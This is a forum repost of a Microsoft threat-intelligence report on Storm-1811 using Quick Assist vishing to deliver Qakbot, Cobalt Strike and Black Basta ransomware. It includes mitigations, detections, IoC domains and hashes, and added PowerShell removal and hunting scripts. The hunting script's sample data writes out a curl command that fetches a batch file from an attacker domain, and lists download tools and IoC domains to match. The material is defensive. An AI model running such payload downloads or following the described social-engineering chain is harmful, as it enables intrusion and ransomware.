Threat actors misusing Quick Assist in social engineering attacks leading to ransomware
<blockquote data-quote="Microsoft Threat Intelligence" data-source="post: 1086953"><p>Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool <a href="https://learn.microsoft.com/windows/client-management/client-tools/quick-assist" target="_blank">Quick Assist</a> to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing (<a href="https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-a-vishing-attack" target="_blank">vishing</a>), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware.</p><p></p><p>Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. 
Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device.</p><p></p><p>In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.</p><p></p><p>Organizations can also reduce the risk of attacks by <a href="https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization" target="_blank">blocking or uninstalling</a> Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. 
Additionally, <a href="https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435" target="_blank">tech support scams</a> are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of <a href="https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-social-engineering." target="_blank">social engineering attacks</a>. </p><p></p><h2>Social engineering</h2><p></p><p>One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller.</p><p></p><p>For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks – a type of <a href="https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf" target="_blank">email bombing attack</a>, where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue.</p><p></p><p>During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. 
The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig1-Quick-Assist.webp" alt="Screenshot of Quick Assist prompt to enter security code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 1. Quick Assist prompt to enter security code</em></p><p></p><p>After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting <em>Allow</em> shares the user’s screen with the actor.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig2-Quick-Assist.webp" alt="Screenshot of Quick Assist dialog box asking permission to allow screen sharing" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 2. Quick Assist dialog box asking permission to allow screen sharing</em></p><p></p><p>Once in the session, the threat actor can select <em>Request Control</em>, which if approved by the target, grants the actor full control of the target’s device.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig3-Quick-Assist-1024x89.webp" alt="Screenshot of Quick Assist dialog box asking permission to allow control" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 3. Quick Assist dialog box asking permission to allow control</em></p><h2>Follow-on activity leading to Black Basta ransomware</h2><p></p><p>Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. 
In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig4-Quick-Assist.webp" alt="Screenshot of two lines of cURL commands" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 4. Examples of cURL commands to download batch files and ZIP files</em></p><p></p><p>Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811.</p><p></p><p>ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.</p><p></p><p>The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. </p><p></p><p>After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network.</p><p></p><p>Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. 
Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.</p><p></p><h2>Recommendations</h2><p></p><p>Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:</p><p></p><ul> <li data-xf-list-type="ul">Consider <a href="https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization" target="_blank">blocking or uninstalling</a> Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as <a href="https://www.microsoft.com/security/business/endpoint-management/microsoft-intune-remote-help" target="_blank">Remote Help</a>, block or remove Quick Assist as a best practice. Remote Help is part of the <a href="https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization" target="_blank">Microsoft Intune Suite</a> and provides authentication and security controls for helpdesk connections.</li> <li data-xf-list-type="ul">Educate users about protecting themselves from <a href="https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435" target="_blank">tech support scams</a>. 
Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services.</li> <li data-xf-list-type="ul">Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.</li> <li data-xf-list-type="ul">If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.</li> <li data-xf-list-type="ul">Users who have been affected by a tech support scam can also use the Microsoft <a href="https://support.microsoft.com/windows/cfa4609a-92cc-4808-95e8-392b4ffd0753" target="_blank">technical support scam form</a> to report it.</li> </ul><p></p><p>Microsoft recommends the following mitigations to reduce the impact of this threat:</p><p></p><ul> <li data-xf-list-type="ul">Educate users about <a href="https://www.microsoft.com/security/business/security-101/what-is-email-security?ocid=magicti_ta_abbreviatedmktgpage" target="_blank">protecting personal and business information</a> in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.</li> <li data-xf-list-type="ul">Educate users about <a href="https://www.microsoft.com/security/business/security-101/what-is-malware?ocid=magicti_ta_abbreviatedmktgpage" target="_blank">preventing malware infections</a>, such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.</li> <li data-xf-list-type="ul">Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. 
<a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-security-center-mdo?ocid=magicti_ta_learndoc" target="_blank">Microsoft Defender for Office 365</a> brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.</li> <li data-xf-list-type="ul">Turn on <a href="https://learn.microsoft.com/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus" target="_blank">cloud-delivered protection</a> in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.</li> <li data-xf-list-type="ul">Enable <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?ocid=magicti_ta_learndoc" target="_blank">network protection</a> to prevent applications or users from accessing malicious domains and other malicious content on the internet.</li> <li data-xf-list-type="ul">Turn on <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection" target="_blank">tamper protection</a> features to prevent attackers from stopping security services.</li> <li data-xf-list-type="ul">Enable <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations" target="_blank">investigation and remediation</a> in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.</li> <li data-xf-list-type="ul">Refer to <a href="https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/" target="_blank">Microsoft’s human-operated ransomware overview</a> for general hardening recommendations against 
ransomware attacks.</li> </ul><p></p><p>Microsoft Defender XDR customers can turn on <a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc" target="_blank">attack surface reduction rules</a> to prevent common attack techniques:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion" target="_blank">Block executable files from running unless they meet a prevalence, age, or trusted list criterion</a></li> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-execution-of-potentially-obfuscated-scripts" target="_blank">Block execution of potentially obfuscated scripts</a></li> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands" target="_blank">Block process creations originating from PSExec and WMI commands</a></li> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#use-advanced-protection-against-ransomware" target="_blank">Use advanced protection against ransomware</a></li> </ul><h2>Detection details</h2><h3>Microsoft Defender Antivirus </h3><p></p><p>Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Qakbot" target="_blank">TrojanDownloader:O97M/Qakbot</a></li> <li data-xf-list-type="ul"><a 
href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qbot" target="_blank">Trojan:Win32/QBot</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qakbot" target="_blank">Trojan:Win32/Qakbot</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Qakbot" target="_blank">TrojanSpy:Win32/Qakbot</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/threat-search?query=Behavior:Win32/Qakbot.A" target="_blank">Behavior:Win32/Qakbot</a></li> </ul><p></p><p>Black Basta threat components are detected as the following:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Basta.B&threatId=-2147132479" target="_blank">Behavior:Win32/Basta</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Basta.AA&threatId=-2147149077" target="_blank">Ransom:Win32/Basta</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Basta!BV&threatId=-2147142676" target="_blank">Trojan:Win32/Basta</a></li> </ul><p></p><p>Microsoft Defender Antivirus detects Beacon running on a victim process as the following:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/CobaltStrike" target="_blank">Behavior:Win32/CobaltStrike</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/CobaltStrike&threatId=-2147180169" target="_blank">Backdoor:Win64/CobaltStrike</a></li> <li data-xf-list-type="ul"><a 
href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win64/CobaltStrike" target="_blank">HackTool:Win64/CobaltStrike</a></li> </ul><p></p><p>Additional Cobalt Strike components are detected as the following:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375" target="_blank">TrojanDropper:PowerShell/Cobacis</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/TurtleLoader.CS!dha&threatId=-2147187531" target="_blank">Trojan:Win64/TurtleLoader.CS</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/ShellCode.BN&threatId=-2147237640" target="_blank">Exploit:Win32/ShellCode.BN</a></li> </ul><h3>Microsoft Defender for Endpoint</h3><p></p><p>Alerts with the following title in the security center can indicate threat activity on your network:</p><p></p><ul> <li data-xf-list-type="ul">Suspicious activity using Quick Assist</li> </ul><p></p><p>The following alerts might also indicate activity related to this threat. 
Note, however, that these alerts can also be triggered by unrelated threat activity.</p><p></p><ul> <li data-xf-list-type="ul">Suspicious curl behavior</li> <li data-xf-list-type="ul">A file or network connection related to a ransomware-linked emerging threat activity group detected —<em>This alert captures Storm-1811 activity</em></li> <li data-xf-list-type="ul">Ransomware-linked emerging threat activity group Storm-0303 detected — <em>This alert captures some Qakbot distributor activity</em></li> <li data-xf-list-type="ul">Possible Qakbot activity</li> <li data-xf-list-type="ul">Possible NetSupport Manager activity</li> <li data-xf-list-type="ul">Possibly malicious use of proxy or tunneling tool</li> <li data-xf-list-type="ul">Suspicious usage of remote management software</li> <li data-xf-list-type="ul">Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)</li> <li data-xf-list-type="ul">Human-operated attack using Cobalt Strike</li> <li data-xf-list-type="ul">Ransomware behavior detected in the file system</li> </ul><h2>Indicators of compromise</h2><p></p><p><strong>Domain names:</strong></p><p></p><ul> <li data-xf-list-type="ul">upd7a[.]com</li> <li data-xf-list-type="ul">upd7[.]com</li> <li data-xf-list-type="ul">upd9[.]com</li> <li data-xf-list-type="ul">upd5[.]pro</li> </ul><p></p><p><strong>SHA-256:</strong></p><p></p><ul> <li data-xf-list-type="ul">71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8</li> <li data-xf-list-type="ul">0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0</li> <li data-xf-list-type="ul">1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30</li> <li data-xf-list-type="ul">93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7</li> <li data-xf-list-type="ul">1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb</li> </ul><p></p><p><strong>ScreenConnect relay:</strong></p><p></p><ul> <li data-xf-list-type="ul">instance-olqdnn-relay.screenconnect[.]com</li> 
</ul><p></p><p><strong>NetSupport C2:</strong></p><p></p><ul> <li data-xf-list-type="ul">greekpool[.]com</li> </ul><p></p><p><strong>Cobalt Strike Beacon C2:</strong></p><p></p><ul> <li data-xf-list-type="ul">zziveastnews[.]com</li> <li data-xf-list-type="ul">realsepnews[.]com</li> </ul><h2>Advanced hunting</h2><h3>Microsoft Defender XDR</h3><p></p><p>To locate possible malicious activity, run the following query in the Microsoft Defender portal. This query looks for possible email bombing activity:</p><p></p><pre><code>EmailEvents
| where EmailDirection == "Inbound"
| make-series Emailcount = count() on Timestamp step 1h by RecipientObjectId
| extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount)
| mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp
| where Anomalies != 0
| where AnomalyScore >= 10</code></pre><h3>Microsoft Sentinel</h3><p></p><p>Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the <a href="https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy" target="_blank">Microsoft Sentinel Content Hub</a> to have the analytics rule deployed in their Sentinel workspace.</p><p></p><p>Microsoft Sentinel also has a range of hunting queries available in the Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. 
These hunting queries include the following:</p><p></p><p>Qakbot:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/Qakbot" target="_blank">Qakbot hunting queries</a></li> </ul><p></p><p>Cobalt Strike:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker%20Tools%20Threat%20Protection%20Essentials/Hunting%20Queries/CobaltDNSBeacon.yaml" target="_blank">Cobalt Strike DNS Beaconing</a></li> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/Potential%20ransomware%20activity%20related%20to%20Cobalt%20Strike.yaml" target="_blank">Potential ransomware activity related to Cobalt Strike</a></li> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/FalconFriday/Analytic%20Rules/SuspiciousNamedPipes.yaml" target="_blank">Suspicious named pipes</a></li> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/cobalt-strike-invoked-w-wmi.yaml" target="_blank">Cobalt Strike Invocation using WMI</a></li> </ul><h2>References</h2> <ul> <li data-xf-list-type="ul"><a href="https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf" target="_blank">Defense and Mitigations from E-mail Bombing</a>. U.S. 
Department of Health and Human Services, Health Sector Cybersecurity Coordination Center</li> </ul><h2>Learn more</h2><p></p><p>For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <a href="https://aka.ms/threatintelblog" target="_blank">Threat intelligence | Microsoft Security Blog</a>.</p><p></p><p>To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href="https://www.linkedin.com/showcase/microsoft-threat-intelligence" target="_blank">Microsoft Threat Intelligence | LinkedIn</a>, and on X (formerly Twitter) at <a href="https://twitter.com/MsftSecIntel" target="_blank">https://twitter.com/MsftSecIntel</a>.</p><p></p><p>To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href="https://thecyberwire.com/podcasts/microsoft-threat-intelligence" target="_blank">https://thecyberwire.com/podcasts/microsoft-threat-intelligence</a>.</p><p></p><p></p><p>The post <a href="https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/" target="_blank">Threat actors misusing Quick Assist in social engineering attacks leading to ransomware</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog" target="_blank">Microsoft Security Blog</a>.</p></blockquote><p></p>
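The recommendations in the quoted post suggest blocking or uninstalling Quick Assist where it is not used. The following PowerShell script is an added example, not code from the Microsoft post or from the Quick Assist documentation it links to. It inventories and removes both forms in which Quick Assist ships on Windows 10/11, the Features-on-Demand capability and the Microsoft Store app, and then verifies the result. The capability name prefix `App.Support.QuickAssist` and the Store package name `MicrosoftCorporationII.QuickAssist` are assumptions to verify on your own build (the `-WhatIf` dry run lists what would be removed without changing anything); the function names are the example's own.

```powershell
# Added example (not code from the Microsoft post or the Quick Assist docs):
# inventory and remove Quick Assist from a Windows 10/11 device, covering both
# forms it ships in: the Features-on-Demand capability and the Microsoft Store app.
# Run in an elevated session. The capability prefix 'App.Support.QuickAssist' and
# the Store package name 'MicrosoftCorporationII.QuickAssist' are assumptions to
# verify on your build (the -WhatIf dry run shows what would be removed).
#Requires -RunAsAdministrator

function Get-QuickAssistInstallState {
    # Emits one record per Quick Assist installation found; emits nothing if absent.

    # 1. Features-on-Demand capability (older Windows 10/11 builds)
    Get-WindowsCapability -Online |
        Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' } |
        ForEach-Object { [pscustomobject]@{ Kind = 'Capability'; Name = $_.Name } }

    # 2. Microsoft Store app, installed for any existing user profile ...
    Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Kind = 'AppxPackage'; Name = $_.PackageFullName } }

    # ... and provisioned in the image, so new user profiles would receive it again
    Get-AppxProvisionedPackage -Online |
        Where-Object { $_.DisplayName -eq 'MicrosoftCorporationII.QuickAssist' } |
        ForEach-Object { [pscustomobject]@{ Kind = 'AppxProvisioned'; Name = $_.PackageName } }
}

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    $installed = @(Get-QuickAssistInstallState)
    if ($installed.Count -eq 0) {
        Write-Host 'Quick Assist is not installed on this device.'
        return
    }

    foreach ($item in $installed) {
        # ShouldProcess honours -WhatIf / -Confirm for each removal
        if (-not $PSCmdlet.ShouldProcess($item.Name, "Remove $($item.Kind)")) { continue }
        switch ($item.Kind) {
            'Capability'      { Remove-WindowsCapability -Online -Name $item.Name | Out-Null }
            'AppxPackage'     { Remove-AppxPackage -AllUsers -Package $item.Name }
            'AppxProvisioned' { Remove-AppxProvisionedPackage -Online -PackageName $item.Name | Out-Null }
        }
    }

    # Nothing was changed in a dry run, so skip the verification step
    if ($WhatIfPreference) { return }

    # Verify the result so the run can be audited
    $remaining = @(Get-QuickAssistInstallState)
    if ($remaining.Count -eq 0) { Write-Host 'Quick Assist removed; nothing remains installed.' }
    else { Write-Warning "Quick Assist still present: $($remaining.Name -join ', ')" }
}

Remove-QuickAssist -WhatIf   # dry run: lists what would be removed
# Remove-QuickAssist         # actual removal
```

Removing the package does not by itself prevent a user from installing the Store app again where the Store is reachable; the Microsoft guidance on disabling Quick Assist within your organization, linked in the recommendations above, covers blocking it with app control policy, which is the more durable control. The provisioned-package check matters because a package that is only removed for existing users reappears for every new profile created on the device.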
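The post describes the follow-on activity as a scripted cURL download of batch or ZIP files launched during the Quick Assist session, and lists "Suspicious curl behavior" among the Defender for Endpoint alerts. The following PowerShell is an added hunting example, not Microsoft's detection logic and not code from the post. It takes process-creation records (for example built from Security event 4688 or Sysmon event 1), flags download-tool launches that occur within a configurable window after a `QuickAssist.exe` start on the same host, and separately matches command lines against the domain IoCs listed above. The 30-minute window, the tool list, the payload-extension pattern, the function name and the sample records are all constructed assumptions, not values from the post.

```powershell
# Added hunting example (not from the Microsoft post, not Microsoft detection logic).
# Flags download-tool launches shortly after a Quick Assist start on the same host,
# and command lines that reference the post's domain IoCs. Thresholds are assumptions.

$QuickAssistWindowMinutes = 30                     # assumption: tune to your environment
$DownloadTools = @('curl.exe', 'certutil.exe', 'bitsadmin.exe', 'powershell.exe')

# Domain IoCs as listed in the post (defanged there); refanged here for matching only.
$IocDomains = @('upd7a[.]com', 'upd7[.]com', 'upd9[.]com', 'upd5[.]pro') |
    ForEach-Object { $_.Replace('[.]', '.') }

function Find-QuickAssistFollowOn {
    param(
        # Each record: Time (datetime), Computer, ProcessName (image file name), CommandLine
        [Parameter(Mandatory)] [object[]] $Events
    )
    $qaStarts = @($Events | Where-Object { $_.ProcessName -ieq 'QuickAssist.exe' })

    foreach ($e in $Events) {
        if ($DownloadTools -notcontains $e.ProcessName.ToLower()) { continue }

        # Quick Assist starts on the same host inside the look-back window
        $recentQa = @($qaStarts | Where-Object {
            $_.Computer -eq $e.Computer -and
            $_.Time -le $e.Time -and
            ($e.Time - $_.Time).TotalMinutes -le $QuickAssistWindowMinutes
        })
        $iocHit = @($IocDomains | Where-Object { $e.CommandLine -match [regex]::Escape($_) })
        $payloadHit = $e.CommandLine -match '\.(bat|cmd|zip|ps1)(\s|"|$)'

        if ($recentQa.Count -eq 0 -and $iocHit.Count -eq 0) { continue }

        $reasons = @(
            if ($recentQa.Count) {
                $mins = [int]($e.Time - $recentQa[0].Time).TotalMinutes
                "launched $mins min after QuickAssist.exe"
            }
            if ($iocHit.Count) { "command line references IoC domain: $($iocHit -join ', ')" }
            if ($payloadHit)   { 'fetches a script or archive payload' }
        )
        [pscustomobject]@{
            Computer    = $e.Computer
            Time        = $e.Time
            Process     = $e.ProcessName
            Reason      = $reasons -join '; '
            CommandLine = $e.CommandLine
        }
    }
}

# Constructed sample records, not real telemetry. In production build them from
# Security event 4688 (NewProcessName, CommandLine) or Sysmon event 1 via Get-WinEvent.
# WS01 shows the pattern the post describes; BUILD01 is an unrelated developer download.
$t0 = [datetime]'2024-05-01T10:00:00'
$SampleEvents = @(
    [pscustomobject]@{ Time = $t0;               Computer = 'WS01';    ProcessName = 'QuickAssist.exe'; CommandLine = 'QuickAssist.exe' }
    [pscustomobject]@{ Time = $t0.AddMinutes(7); Computer = 'WS01';    ProcessName = 'curl.exe';
                       CommandLine = 'curl.exe -o C:\Users\Public\update.bat https://upd7.com/example-path' }
    [pscustomobject]@{ Time = $t0.AddHours(5);   Computer = 'BUILD01'; ProcessName = 'curl.exe';
                       CommandLine = 'curl.exe -sSL https://example.invalid/sbom.json -o sbom.json' }
)

Find-QuickAssistFollowOn -Events $SampleEvents | Format-List
```

Time correlation rather than parent-child linkage is used because commands a remote helper types into a shared session typically run under the user's own shell, not as children of `QuickAssist.exe`. When the records are built from the Security log, event 4688 only carries the command line if command-line auditing is enabled in audit policy; Sysmon event 1 records it by default. Treat a hit as a triage lead to confirm against the Quick Assist session itself, not as a verdict.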
[QUOTE="Microsoft Threat Intelligence, post: 1086953"] Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool [URL='https://learn.microsoft.com/windows/client-management/client-tools/quick-assist']Quick Assist[/URL] to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing ([URL='https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-a-vishing-attack']vishing[/URL]), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware. MITIGATE THIS THREAT [URL='https://blogs.technet.microsoft.com/mmpc/#recommendations'] Get recommendations [/URL] Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device. 
RANSOMWARE AS A SERVICE [URL='https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#defending-against-ransomware'] Protect users and orgs [/URL] In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity. TECH SUPPORT SCAMS [URL='https://support.microsoft.com/en-us/windows/report-a-technical-support-scam-cfa4609a-92cc-4808-95e8-392b4ffd0753'] Report scam [/URL] Organizations can also reduce the risk of attacks by [URL='https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization']blocking or uninstalling[/URL] Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, [URL='https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435']tech support scams[/URL] are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of 